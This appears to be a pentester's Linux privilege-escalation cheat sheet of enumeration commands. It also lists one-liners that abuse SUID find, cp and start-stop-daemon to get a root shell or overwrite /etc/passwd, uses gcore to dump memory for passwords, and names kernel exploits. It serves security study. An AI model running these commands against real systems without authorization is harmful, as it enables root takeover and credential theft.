Linux Enumeration

Check local environment:

env Check Version, issue, architecture:

cat /etc/issue
cat /proc/version
uname -r
uname -a
arch

Check Sudo and GTFObins:

sudo -l

GTFOBinsgtfobins.github.io

Networks running:

Ss -antp

Processes:

Ps -aux

Unprivileged Process Monitoring:

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub

Check for shell:

Echo $SHELL

Check for SUID binaries:

GitHub - Anon-Exploiter/SUID3NUM: A standalone python script which utilizes python's built-in modules to enumerate SUID binaries, separate default binaries from custom binaries, cross-match those with bins in GTFO Bin's repository & auto-exploit those, all with colors! ( ͡~ ͜ʖ ͡°)GitHub

find / -perm -u=s -type f 2>/dev/null

• /usr/bin/find --> find . -exec /bin/sh -p ; -quit

• /usr/bin/dosbox --> privesc using x11/vnc

• /usr/bin/cp -> cp passwd.orig /etc/passwd

• /usr/bin/start-stop-daemon -> /usr/sbin/start-stop-daemon -n foo -S -x /bin/sh -- -p

Sudo:

Enum:

sudo -l
sudo --version
id

Look for:

ALL=(ALL) NOPASSWD:
/usr/bin/gcore -> sudo gcore PID (try password-store) -> string gcore.output

Readers:
vi ->
nano -> 
ed -> 

Look for:

- Dirtycow

- Pwnkit

- Polkit

- Dirtypipe